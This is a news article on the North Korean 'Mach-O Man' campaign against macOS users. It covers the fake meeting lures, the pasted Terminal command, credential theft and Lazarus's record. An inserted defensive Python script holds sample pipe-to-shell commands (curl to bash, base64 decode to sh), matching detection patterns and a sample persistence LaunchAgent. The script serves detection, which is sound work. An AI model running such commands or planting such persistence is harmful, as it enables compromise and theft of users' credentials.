North Korean hackers target Apple users with fake video calls: how the “Mach-O Man” malware deception works

A new cybercriminal campaign, attributed to the hacker group Lazarus (North Korea), generates fake Zoom and Google Meet meetings to gain access to companies and steal sensitive information. Through a malicious program (malware), it targets employees who use macOS (Apple) to steal their passwords, browsing history and other information that facilitates intrusions. As far as Clarín could learn, there are cases of Latin American companies in the fintech world that have already been targeted by this type of attack.

The information comes from an investigation carried out by a hacker and cybercrime intelligence specialist, Mauro Eldritch, who published an article detailing how this threat operates: the attack starts with a false invitation to a video call, continues with an alleged technical error that forces the victim to copy and paste a command, and ends with the theft of credentials, active browser sessions and Apple password data.

North Korea’s presence in the corporate cybercrime world is growing. In 2023, the hacker discovered an active campaign of a malicious program posing as a QR code generator to trick users and try to extract information. Over the past year, a campaign of fake interviews by North Korean agents continued; they were looking to infiltrate a Mexican fintech.

The analyst named the malware “Mach-O Man”, a play on words combining the name of the binary format used by macOS (Mach-O) and the historic Village People song.

How malware operates

The infection begins, according to the analysis published on the ANY.RUN platform, with social engineering: deceiving the employee. According to the investigation, Telegram is one of the attackers' favorite applications for establishing contact with the victim (which is why companies ask employees not to use communication apps other than the official ones, such as Slack or Teams).

They often use accounts stolen from crypto-world figures such as investors and exploit those contact lists to search for victims. This step is key and explains why the victim “knows” the sender of these messages and believes it is a legitimate exchange.

The link redirects to a fake page that imitates Zoom, Google Meet, or even Microsoft Teams. Once there, an alleged technical error appears and the victim receives an instruction to “fix” the problem: copy and paste a command into the Mac Terminal, the system's text-based command interface. That is the key to the attack: the user himself executes a command that opens the door to the attacker, instead of the attacker exploiting a system vulnerability.

From then on, the malware downloads a fake application that can impersonate Zoom, Teams, or even a system message. That window asks the user to enter their Mac password several times. Meanwhile, in the background, the program begins to collect information from the computer, installs mechanisms to remain active even if the computer restarts, and looks for saved browser credentials, cookies, and open sessions.
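The two steps above that leave traces on the machine, the pasted Terminal command and the persistence mechanism, are what a defender can hunt for. The script below is an added example, not code from Eldritch's analysis or from the campaign: it flags shell-history entries that pipe a download or a decoded blob straight into a shell, and LaunchAgent plists that auto-start something from a user-writable path. The history lines, the plist label and all paths are constructed placeholders.

```python
import plistlib
import re

# Constructed sample of a ~/.zsh_history (extended format) as reviewed after an incident;
# the URL and commands are invented, not indicators from the real campaign.
SAMPLE_HISTORY = """\
: 1712000000:0;ls -la ~/Downloads
: 1712000100:0;curl -fsSL https://meeting-fix.example/fix.sh | bash
: 1712000200:0;echo aGVsbG8= | base64 -d | sh
: 1712000300:0;git status
"""

# Heuristics for the "paste this to fix the call" step: a remote fetch or a decoded
# blob piped directly into a shell interpreter.
PASTE_PATTERNS = [
    re.compile(r"\b(curl|wget)\b.*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    re.compile(r"base64\s+(-d|--decode|-D)\b.*\|\s*(sudo\s+)?(ba|z)?sh\b"),
]

def flag_history(history: str) -> list[str]:
    """Return the commands in a zsh history dump that match PASTE_PATTERNS."""
    hits = []
    for line in history.splitlines():
        # zsh extended history lines look like ": <epoch>:<duration>;<command>"
        cmd = line.split(";", 1)[1] if line.startswith(": ") and ";" in line else line
        if any(p.search(cmd) for p in PASTE_PATTERNS):
            hits.append(cmd)
    return hits

# Constructed LaunchAgent plists: one standing in for a persistence entry that survives a
# restart, one benign. Label and script path are hypothetical.
SAMPLE_PLIST = plistlib.dumps({
    "Label": "com.example.meetinghelper",
    "ProgramArguments": ["/bin/bash", "-c", "/Users/Shared/.mh/update.sh"],
    "RunAtLoad": True,
    "KeepAlive": True,
})
BENIGN_PLIST = plistlib.dumps({
    "Label": "com.example.clock",
    "ProgramArguments": ["/usr/bin/true"],
    "RunAtLoad": True,
})

USER_WRITABLE = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")

def suspicious_launch_agent(plist_bytes: bytes) -> bool:
    """True when a LaunchAgent auto-starts and runs something from a user-writable path."""
    p = plistlib.loads(plist_bytes)
    args = " ".join(p.get("ProgramArguments", []))
    autostarts = bool(p.get("RunAtLoad")) or bool(p.get("KeepAlive"))
    return autostarts and any(path in args for path in USER_WRITABLE)
```

On a real Mac the same functions would be fed the contents of ~/.zsh_history and each file under ~/Library/LaunchAgents; a hit is a lead for triage, not proof of compromise on its own.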

According to Eldritch’s analysis, all that information is compressed and sent to the attackers via Telegram. From then on, the stolen information can be put to many uses, all of them malicious.

What sets this operation apart, since the technique itself is not new, is that it was detected targeting companies in Latin America.

Lazarus: North Korea, active in the region

Lazarus is the name by which one of the most famous and persistent hacker groups in the world is known, linked for years to the North Korean regime. The first traces of its activity appear between the late 2000s and early 2010s, when researchers began to link it with espionage and sabotage campaigns against South Korea.

Over time, it went from being seen as a cyberespionage actor to becoming a hybrid machine that combines political operations, information theft, destructive attacks and financial heists on a global scale.

Strictly speaking, although we speak of “North Korean hackers”, in technical terminology their actions are said to be “attributed to North Korea”, and analysts also speak of “degrees of confidence” in the attribution. In the case of Mach-O Man, the degree of confidence that Lazarus is behind it is high.

“When analyzing the Mach-O Man campaign alongside previous Check Point investigations such as The Whitelist Illusion, a clear pattern emerges in the way Lazarus operates: leveraging trust as an entry point,” says Alejandro Botter, Check Point engineering manager for southern Latin America, in conversation with Clarín.

“Whether through fake virtual meetings that lead people to take actions that seem normal, or through the use of relationships previously considered safe in crypto environments, the group avoids direct attacks and instead relies on legitimate processes to go unnoticed,” he adds.

“From Check Point’s perspective, it is relevant how this activity aligns with patterns and trends we have observed over time at Lazarus. Previous research shows that this actor prioritizes highly directed operations, focused on high-value profiles and environments, and adapted to the technological and operational contexts of its objectives,” he continues.

“In that sense, the use of credible decoys, targeting specific users and the preference for low-noise initial access mechanisms reinforce a consistent strategy of the group, regardless of the malware or specific campaign involved,” he closes.

Among the best-known Lazarus attacks are the hack of Sony Pictures in 2014, which exposed unreleased films, internal emails and employee data; the theft of US$81 million from the Central Bank of Bangladesh in 2016 through the SWIFT system; and, in 2017, the WannaCry ransomware, the best-known in the world: it infected hundreds of thousands of computers in more than 150 countries.

In recent years, furthermore, Lazarus was once again at the center of the scene for its focus on the crypto ecosystem: in 2022, the FBI identified the group as responsible for the theft of some US$620 million from the Ronin network, linked to the Axie Infinity game.

By Editor
